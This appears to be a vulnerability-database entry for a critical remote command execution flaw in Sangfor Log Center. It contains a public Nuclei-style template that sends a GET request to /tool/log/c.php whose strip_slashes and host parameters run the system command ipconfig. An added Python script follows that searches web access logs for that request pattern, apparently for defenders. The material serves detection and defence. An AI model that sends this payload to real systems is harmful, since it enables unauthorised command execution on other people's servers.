sangfor-cphp-rce: Sangfor Log Center - Remote Command Execution

Date: 2025-08-01 | Affected software: Sangfor Log Center | PoC: public

Vulnerability description

Sangfor Log Center is vulnerable to RCE.

PoC code [public]

id: sangfor-cphp-rce

info:
  name: Sangfor Log Center - Remote Command Execution
  author: DhiyaneshDk
  severity: critical
  description: Sangfor Log Center is vulnerable to RCE.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1
  metadata:
    verified: true
    max-request: 1
    fofa-query: "isHighPerformance : !!SFIsHighPerformance"
  tags: sangfor,rce,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Windows IP"
          - "Log Helper"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022027457dbcaafdb8941f869ba6e86f0f3774e159671f613a70c85ba3d20d4ad9ac02207110f34387c2b8dfd18e25351e875835ec7d0e8f5cedc808302e3d8cb35875c6:922c64590222798bb761d5b6d8e72950
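
For defenders, the request shape the template sends (a query to /tool/log/c.php carrying a strip_slashes parameter) can be searched for in web access logs. The following is an added example, not part of the original template; it assumes logs in Apache/nginx "combined" format, and the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: access logs use the Apache/nginx "combined" format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/tool/log/c.php"  # path taken from the template on this page
PARAM = "strip_slashes"          # parameter taken from the template on this page

def inspect_line(line):
    """Return a finding dict if the line matches the template's request shape, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None  # unparseable line: skip rather than guess
    parts = urlsplit(m["target"])
    # Normalise the path: percent-decode, collapse repeated slashes, ignore case
    # (the template's matcher expects a Windows host, where paths are case-insensitive).
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    if path != TARGET_PATH:
        return None
    # parse_qs percent-decodes values, so encoded function names are compared in clear.
    params = parse_qs(parts.query, keep_blank_values=True)
    if PARAM not in params:
        return None  # plain visits to the page without the parameter are not flagged
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "status": int(m["status"]),
        "strip_slashes": params[PARAM][0],
        "host": params.get("host", [""])[0],
    }

def scan(lines):
    """Collect findings from an iterable of log lines."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "GET /tool/log/c.php?strip_slashes=system&host=ipconfig HTTP/1.1" 200 1534',
    '198.51.100.7 - - [01/Aug/2025:10:00:05 +0000] "GET /tool//log/C.PHP?host=x&strip_slashes=%73ystem HTTP/1.1" 200 912',
    '203.0.113.20 - - [01/Aug/2025:10:01:00 +0000] "GET /tool/log/c.php HTTP/1.1" 200 4021',
    '203.0.113.20 - - [01/Aug/2025:10:02:00 +0000] "GET /index.php?strip_slashes=system HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so this covers GET requests like the template's; parameters sent in a request body would need inspection at a proxy or WAF.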
